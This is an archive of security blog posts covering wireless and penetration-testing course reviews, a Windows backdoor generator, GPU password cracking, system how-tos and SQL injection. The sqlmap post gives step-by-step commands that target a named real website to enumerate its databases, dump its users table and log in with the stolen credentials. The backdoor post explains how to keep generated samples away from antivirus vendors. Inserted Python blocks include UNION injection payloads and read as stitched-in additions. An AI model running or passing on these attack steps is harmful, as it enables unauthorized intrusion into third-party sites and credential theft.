(3) Victim - Google Nexus One (Android 2.3.6)
(4) Victim - TP-LINK TL-WN321G (54Mbps, Ver 4.1) (supports injection and monitor mode)
(5) Victim - TP-LINK TL-WN821N (300Mbps, Ver 3.1) (supports injection and monitor mode)
(6) Attacker - Cloned ALFA Networks AWUS036H USB 500mW (Realtek RTL8187L)

The Course

This course, version 3.0, is designed for beginners. It teaches wireless concepts and their weaknesses. The tool mentioned most is the Aircrack-ng suite, but others are covered too, such as GPU-based brute-forcing tools and other advanced tools. However, it does not cover attacks on WPA/WPA2-Enterprise.

Offensive Security does not provide a lab for this course. You have to set up your own lab for practice, with the hardware mentioned above.

The Challenge

The four-hour challenge requires you to SSH to a BackTrack box and complete the objectives. After the challenge, you must submit your report within 24 hours.

Finally, the exam was over. Within 3 business days I received an email informing me that I had passed the challenge. If you pass, you become an Offensive Security Wireless Professional (OSWP). I am an OSWP now!

The Conclusion

In conclusion, this course teaches you all the basics of wireless cracking.

Sunday, February 12, 2012

Automatic Backdoor Generator for Windows System

Astr0baby developed an automatic tool to generate a backdoor for Windows systems.

Later, www.coresec.org modified his work to make it run on Back|Track 5, so I made the modified source code available here.

Then I slightly modified coresec.org's work and made a video about it here for reference.



The anti-virus evasion of the generated file is not very good, partly because some users submit the generated file to free online scanners and/or local anti-virus programs to confirm whether it is detected. The problem is that the free online scanners pass the sample on to the anti-virus companies for further analysis, so the detection rate goes up over time; they work as a kind of honeypot. Therefore, if you want to test the generated file locally, make sure the box cannot reach the internet, as the result would otherwise be submitted to the anti-virus company after the scan.

I find automatic backdoor generation quite interesting. I completely rewrote the code and it can now embed the payload into an executable file. The code does some simple input validation too. The current version is 0.2 at the time of writing. I made a demo video. However, the code is not available at the moment as I am still considering whether to release the source.



PDFs and image files can have backdoors embedded in them in a similar way. Therefore, do not download programs, PDFs or image files from untrusted sources; cracked software and "free" licensed ebooks deserve particular suspicion. This does not only affect Windows: Linux and Mac OS can be infected too.

That's all! See you.

Sunday, February 05, 2012

HOWTO : FreeNAS 8.0.3 RELEASE p1 USB device boot bug fix

The Problem

When I upgraded my FreeNAS to the latest version, FreeNAS 8.0.3 RELEASE p1, it refused to boot and stopped at the following message.

mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).
GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).


I typed the following at the mountroot prompt and it booted fine.

ufs:/dev/da0s1a

The problem is that I would need to type this on every boot. Here is how to fix it permanently.

The Solution

After the system boots and the console menu is displayed, select "9) Shell" to get a shell prompt and do the following.

Step 1 :

nano /etc/fstab

Change from :
/dev/ufs/FreeNASs1a / ufs ro 1 1

To :
/dev/ufs/FreeNASs1a / ufs rw 1 1

Step 2 :

Then, save and exit the editor. Execute the following command :

mount -a

Step 3 :

Next, open up another file :

nano /boot/loader.conf

Change from :
#Fix booting from USB device bug
kern.cam.boot_delay=10000


To :
#Fix booting from USB device bug
kern.cam.boot_delay=20000


Save and exit the editor, then reboot. The boot is now slower than before, but it works. Problem solved!

That's all! See you.

Saturday, January 28, 2012

HOWTO : Using USB Devices on VirtualBox 4.1.8

Using USB devices in VirtualBox 4.1.8, installed on Ubuntu 12.04 LTS, is easy: add your user to the vboxusers group.

sudo usermod -a -G vboxusers samiux

*where samiux is the user name

Then, logout and re-login. Or, reboot your system.

Now you can use USB devices in VirtualBox. However, some devices do not work properly when USB 2.0 is enabled in VirtualBox.

That's all! See you.

Sunday, January 22, 2012

HOWTO : Create a normal user on MySQL and MariaDB

Using the root account for a web application's database access is risky: any SQL injection in the application then runs with full privileges. It is more secure to create a dedicated user for the web application with only the privileges it needs.

Step 1 :

mysqladmin -u root -p create mydatabase

*where mydatabase is the name of the web application's database; it is created as root because the application user does not exist yet

Step 2 :

mysql -u root -p

Step 3 :

GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER ON mydatabase.* TO 'samiux'@'localhost' IDENTIFIED BY 'mypassword';

*where samiux is the application user and mypassword is its password. DROP and ALTER are only needed when the schema changes; if the application does not do that at runtime, leave them out and perform schema changes with an administrative account. On MySQL 8.0 and later, GRANT no longer creates accounts, so create the user first with CREATE USER and then run the GRANT without the IDENTIFIED BY clause.

That's all! See you.

Saturday, January 21, 2012

Course Review - Am I ready for taking Penetration Testing with BackTrack (PWB)

Please be informed that this course has been renamed to "Penetration Testing with Kali Linux (PWK)"

If you have decided to take the course Penetration Testing with BackTrack (PWB), you need to make sure that your knowledge and hardware are suitable. I am going to share my experience with you.

Although this is an entry-level Offensive Security course, you need some networking knowledge (including TCP/IP) and must be able to operate Linux and Windows systems from the command line.

You also need some programming knowledge. You are not required to be an elite programmer, but you need to understand what a program is, how to read it and what it is doing. The languages involved are Perl, C, Python and bash shell script.

Using a virtual machine, such as VMware Player or VirtualBox, is required, because most students run BackTrack in a virtual machine instead of on a dedicated machine. That means at least 2GB of system memory for host and guest together; at least 1GB of RAM for the guest makes things more comfortable.

A reasonably fast internet connection is required. The lab runs over OpenVPN, and your router (if any) must be able to handle the VPN connection. After registering for the course you get a chance to test the VPN connection. If the connection is confirmed to work, you can make the payment; otherwise the course is not suitable for you and you should not pay.

I have connected to the VPN through my Galaxy Nexus and/or Nexus One on a 3G data connection via wifi tethering without problems. Anyway, it all depends on the 3G connection quality.

If you want to do your lab work from anywhere, install BackTrack in a virtual machine hosted on a laptop. I use a virtual disk of around 20GB, which I find a comfortable size.

In addition, there is time. Make sure you have a lot of time for the course and the lab. The course is hard, time-consuming and demanding, so make sure your family understands that you will have little or no time for them during the course. Sometimes I did not sleep for over 24 hours in order to compromise a box in the lab.

Finally, take care of yourself. Do not catch the flu or get sick during the course. I hope you all enjoy the course as much as I did.

Course Review : Penetration Testing with BackTrack

Course Review - Penetration Testing with BackTrack (PWB)

Please be informed that this course has been renamed to "Penetration Testing with Kali Linux (PWK)"

The Background

About 2 to 3 years ago I came across BackTrack 3 and 4. I did not know what this distribution was for. At that time I believed it was for the bad guys, according to a local computer magazine.

Later I came across the term "Penetration Testing" and wanted to know more about this kind of technology and skill. I searched for videos on YouTube and learnt something new, but I did not fully understand what the videos were actually about and doing.

Some people on the internet stated that this course (Penetration Testing with BackTrack) only teaches you how to use the BackTrack Linux distribution and nothing more. Okay, that was not bad at all, as I knew nothing about the distribution. Why not give it a try?

Last year I decided to take this course to learn more about penetration testing and registered. The course version was 3.0 when I took it and it works very well on BackTrack 5 R1. The price is not high compared with other information security courses on the market.

The Course

This course is designed for beginners like me. It requires some networking knowledge, some programming experience and the ability to use Linux and Windows systems. In my opinion it is not designed for very skilled and experienced penetration testers.

You get a VPN lab with several subnets and over 50 machines (I discovered 58) to practise what you have learnt from the course materials. The machines in the lab are not designed for simple or single-step exploitation; you need creative thinking and skill to compromise them.

You are not required to compromise all the machines in the lab before taking the final challenge, the exam; you could compromise just one machine and then enroll for the exam. You have 23 hours and 45 minutes for the exam and must submit the report within the next 24 hours. You should take the exam within 90 days after your lab access expires, unless you extend it.

The compromised lab machines must be documented, as must the exercises in the course materials. In addition, the extra-mile exercises may count towards the exam, I think, so I suggest doing them all if you can.

In my opinion, making some friends in the #offsec IRC channel may help you solve some problems during your lab time. The interesting thing is that the officials in #offsec will not help you much with the lab. Sometimes they give out hints, but these can be misleading or useless. They will also tell you to "Try Harder!". Yes, "Try Harder!" is their slogan.

The Challenge

The exam was not as easy as I thought, especially under pressure. My exam started in the late evening, which meant, because of my time zone, that I had to work overnight from the very beginning. I was very tired during the exam. Even after an hour's nap I could not think clearly. I made some careless mistakes and silly things and wasted a lot of time; my mind was blocked by the problems I ran into. I did not perform very well in the exam.

Finally, the exam was over and the report was submitted. Within 3 business days I received an email informing me that I had passed the challenge. If you pass, you become an Offensive Security Certified Professional (OSCP). I am an OSCP now!

The Conclusion

In conclusion, this course teaches you all the basic penetration testing skills and it is worth taking if you are not already very skilled and experienced in this field. I enjoyed the course very much and learnt a lot from the lab and the course materials. Recommended!


Course Review : Am I ready for taking the course of PWB

Thursday, January 19, 2012

HOWTO : BackTrack 5 R1 Minor Bug Fix

(A) unicornscan GeoIP not found :

cp /usr/share/GeoIP/GeoIP.dat /usr/local/etc/unicornscan/

(B) Waiting for audio system to respond

mkdir ~/.config/autostart
nano ~/.config/autostart/pulseaudio.desktop

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio


(C) Wicd cannot connect to D-Bus

dpkg-reconfigure wicd
update-rc.d wicd defaults



BackTrack WiKi

Sunday, January 01, 2012

HOWTO : Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7-3930K

The Cryptohaze Multiforcer is a high-performance CUDA password cracker designed for large lists of hashes. Performance holds very well with large lists: on a suitable server, cracking a list of 1,000,000 hashes is not significantly slower than cracking a list of 10. For anyone who deals with large lists of password hashes, this is a very useful tool! Supported algorithms include MD5, NTLM, LM, SHA1 and many others. The official Cryptohaze Multiforcer website is here.

Download Cryptohaze-Linux_x64_1_30.tar.bz2

tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2

cd Cryptohaze-Linux

nano single_charset

Append the following :

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=\][';/.,

Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :

./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500
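Before starting a run like the one above it is worth knowing how big the keyspace is and how to verify the cracker's output. The following helper is an added example and is not part of the Cryptohaze tool or of this post: it builds the same 94-character charset as single_charset from Python's string module, estimates the worst-case time for a brute-force run at a hash rate you supply (the rate is an assumed input, not a measurement of the GTX 590s), and writes a constructed SHA1 hash list in the plain one-hash-per-line format that the -f option reads, so a test run can be checked against known plaintexts.

```python
import hashlib
import string

# The blog's single_charset is every printable ASCII character except the space
# (94 symbols). Python's string module gives the same set in a different order.
CHARSET = string.ascii_letters + string.digits + string.punctuation
BLOG_CHARSET = r"""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=\][';/.,"""


def keyspace(length, charset=CHARSET):
    """Number of candidates of exactly `length` characters over `charset`."""
    return len(charset) ** length


def cumulative_keyspace(max_len, charset=CHARSET):
    """Candidates of length 1..max_len, i.e. the work of a full brute-force run."""
    return sum(keyspace(n, charset) for n in range(1, max_len + 1))


def seconds_to_exhaust(max_len, rate_per_sec, charset=CHARSET):
    """Worst-case wall-clock seconds for lengths 1..max_len at `rate_per_sec`
    hashes per second. The rate is whatever the tool reports on your hardware;
    it is an assumed input here, not a measured GTX 590 figure."""
    return cumulative_keyspace(max_len, charset) / rate_per_sec


def sha1_hash_list(plaintexts):
    """Lowercase hex SHA1 digests, one per plaintext."""
    return [hashlib.sha1(p.encode()).hexdigest() for p in plaintexts]


def write_hash_file(path, plaintexts):
    """Write a constructed hash list, one hash per line, for an end-to-end check."""
    with open(path, "w") as fh:
        fh.write("\n".join(sha1_hash_list(plaintexts)) + "\n")


if __name__ == "__main__":
    # Constructed sample: known plaintexts to compare the cracker's output against.
    sample = ["password", "Pa55w0rd!", "a1B2"]
    write_hash_file("my_sha1_hashes.txt", sample)
    for n in range(1, 9):
        print("length %d: %d candidates" % (n, keyspace(n)))
    # Assumed rate of 1e9 hashes/s, purely to show the scale of the estimate.
    print("lengths 1..8 at 1 GH/s: %.1f days" % (seconds_to_exhaust(8, 1e9) / 86400))
```

Feed my_sha1_hashes.txt to the same command line in place of test_hashes/Hashes-SHA1-Full.txt; if the three sample plaintexts come back, the charset and the CUDA setup are working. The length-8 keyspace over 94 characters is 94^8, roughly 6 x 10^15 candidates, which is why a full brute force is normally capped with -m at a length the hardware can finish.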

Hardware Configuration :

CPU : Intel i7-3930K (6 cores / 12 threads with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : Seagate SATA II 1TB x 2
Power Supply : Seasonic X-series 1250W
CPU Heat Sink : Corsair H100 Liquid CPU Cooler
Case : Corsair Graphite Series 600T Black

Remarks :

Installation of CUDA on Back|Track 5 R1

That's all! See you.

Sunday, December 25, 2011

HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10

This tutorial is not my work but OhHeyitsLou's. Please credit him.

Step by step tutorial

Youtube step by step tutorial

That's all! See you.

HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card

Hardware

CPU : Intel i7-3930K (Socket 2011, 6 cores / 12 threads with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R1

BackTrack 5 R1 can boot on an Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" must be added to the boot options by pressing "tab" on the boot menu.

Install BackTrack 5 R1 as usual. When you are asked to reboot, do not remove the BackTrack 5 R1 CD; boot from the CD again. After BackTrack 5 R1 has booted, mount the hard drive and add "nomodeset" to the kernel boot options in grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will boot into BackTrack 5 R1 without problems.

If the kernel is upgraded, rebuild the kernel headers with the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/
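Editing grub.cfg by hand from the live CD is easy to get wrong (a typo on the kernel line leaves the system unbootable), so here is an added example that does the "nomodeset" step for you. It is not part of BackTrack or of this post: it appends the option to every linux / linux16 / linuxefi line in a GRUB2 grub.cfg that does not already carry it, leaves everything else untouched, keeps a .bak copy, and is safe to run twice. The grub.cfg fragment inside it is constructed for the test; the kernel file names and mount point are assumptions.

```python
import re
import sys

# A GRUB2 kernel command line: optional indent, the linux command, then its arguments.
KERNEL_LINE = re.compile(r"^(\s*linux(?:16|efi)?\s+.*?)(\s*)$")


def add_kernel_option(cfg_text, option="nomodeset"):
    """Return grub.cfg text with `option` appended to every kernel line that
    lacks it. Non-kernel lines are returned unchanged, so the function is
    idempotent: running it on its own output changes nothing."""
    out = []
    for line in cfg_text.splitlines():
        m = KERNEL_LINE.match(line)
        if m and option not in m.group(1).split():
            line = m.group(1) + " " + option
        out.append(line)
    return "\n".join(out) + ("\n" if cfg_text.endswith("\n") else "")


def patch_grub_cfg(path, option="nomodeset"):
    """Rewrite grub.cfg in place, keeping the original as <path>.bak.
    Returns True if the file was changed, False if the option was already there."""
    with open(path) as fh:
        original = fh.read()
    patched = add_kernel_option(original, option)
    if patched != original:
        with open(path + ".bak", "w") as fh:
            fh.write(original)
        with open(path, "w") as fh:
            fh.write(patched)
    return patched != original


# Constructed grub.cfg fragment in the shape BackTrack 5 R1 writes (kernel 2.6.39.4).
SAMPLE_CFG = (
    'menuentry "BackTrack 5 R1" {\n'
    "\tlinux /boot/vmlinuz-2.6.39.4 root=UUID=0000 ro text splash vga=791\n"
    "\tinitrd /boot/initrd.img-2.6.39.4\n"
    "}\n"
)

if __name__ == "__main__":
    # e.g. python add_nomodeset.py /mnt/boot/grub/grub.cfg  (hard drive mounted at /mnt)
    print("changed" if patch_grub_cfg(sys.argv[1]) else "already set")
```

Run it from the booted live CD against the grub.cfg on the mounted hard drive, then reboot as described above. Because a kernel upgrade regenerates grub.cfg, re-run it after "prepare-kernel-sources" if the new kernel line comes back without the option.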


Installation of nVidia display driver

Go to the nVidia Developer Zone CUDA Toolkit 4.0 page to download the following. Do not start X11 by issuing "startx"; otherwise, the installation will fail.

(1) Download "Developer Drivers for Linux (270.41.19)" for the nVidia Driver.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run

Replace "xx" with 32 or 64 to match the file you downloaded :

chmod +x devdriver_4.0_linux_xx_270.41.19.run
./devdriver_4.0_linux_xx_270.41.19.run


(2) Download "CUDA Toolkit for Ubuntu Linux 10.10" for the CUDA Toolkit.

32-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run

64-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

Again, replace "xx" with 32 or 64 :

chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run
./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run


(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run


nano /root/.bashrc

Append the following :

export PATH=$PATH:/usr/local/cuda/bin
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64


After that, reboot the system so that the nVidia driver takes effect.

Installation of pyrit

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install


To test whether the installation is correct :

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


That's all! See you.

Before water cooling



After water cooling

Friday, December 23, 2011

HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card

At the time of writing, Ubuntu 12.04 LTS is still under heavy development and at the Alpha 1 stage.

Ubuntu 12.04 LTS boots on the Intel X79 Express chipset without problems, thanks to its kernel version 3.2.

If the system is equipped with an nVidia display card, you need to set "nomodeset" by pressing F6 on the boot menu of the Ubuntu 12.04 LTS Live CD. (Press Enter when the "keyboard" and "human" figures appear at the bottom of the screen during boot.)

That's all! See you.

Friday, September 16, 2011

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may end up in jail. ***

Credit to : ruo911

This is ruo911's work, not mine. I re-post it for educational purposes only.



Command

cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump


Then try to log in with the dumped credentials.

P.S.
1. BackTrack 5 R1 - sqlmap path :
cd /pentest/database/sqlmap

2. user agent option
example :
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
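The commands above only make sense once you see what file.php?id=146 is doing on the server side. The following is an added example, not code from ruo911 or from sqlmap: a constructed in-memory SQLite schema (a files table queried by id and a users table the attacker wants), the lookup written the vulnerable way (the id pasted into the query string), and the same lookup with a bound parameter plus an integer check. The two payloads are the shape of UNION query sqlmap builds for --tables and --dump; the table and column names are assumptions for the demo.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed stand-in for the target: nothing here is real data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO files VALUES (146, 'readme.txt');
        INSERT INTO users VALUES (1, 'test', 'hunter2');
        """
    )
    return conn


def vulnerable_lookup(conn, file_id):
    """What file.php?id=... does when it concatenates the parameter into SQL:
    the attacker controls the tail of the statement."""
    query = "SELECT id, name FROM files WHERE id = " + file_id
    return conn.execute(query).fetchall()


def safe_lookup(conn, file_id):
    """Same query with a bound parameter: the input is always a value, never SQL."""
    return conn.execute(
        "SELECT id, name FROM files WHERE id = ?", (file_id,)
    ).fetchall()


def strict_lookup(conn, file_id):
    """Belt and braces: an id must be a decimal integer, anything else is
    rejected before it ever reaches the database."""
    if not re.fullmatch(r"[0-9]+", file_id):
        raise ValueError("invalid id")
    return safe_lookup(conn, int(file_id))


# UNION payloads of the kind sqlmap generates: first list the tables from the
# catalogue (sqlite_master stands in for information_schema), then read users.
ENUM_TABLES = "146 UNION SELECT name, sql FROM sqlite_master WHERE type='table'"
DUMP_USERS = "146 UNION SELECT username, password FROM users"

if __name__ == "__main__":
    db = build_demo_db()
    print("tables :", [r[0] for r in vulnerable_lookup(db, ENUM_TABLES)][1:])
    print("users  :", vulnerable_lookup(db, DUMP_USERS)[1:])
    print("safe   :", safe_lookup(db, DUMP_USERS))
```

The vulnerable function returns the users table alongside the legitimate row, which is exactly what --dump collects; the parameterised version returns nothing for the same input because the whole string is compared against the integer id, and strict_lookup refuses it outright. When you review code for this bug, look for the concatenation, not for the absence of quotes: a numeric parameter needs no quote to break out of, so the injection here works without a single apostrophe.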

That's all! See you.

HOWTO : SQL Injection by tools

*** Do NOT attack any computer or network without authorization or you may end up in jail. ***

Credit to : medmado1990

This is medmado1990's work, not mine. I re-post it for educational purposes only.





That's all! See you.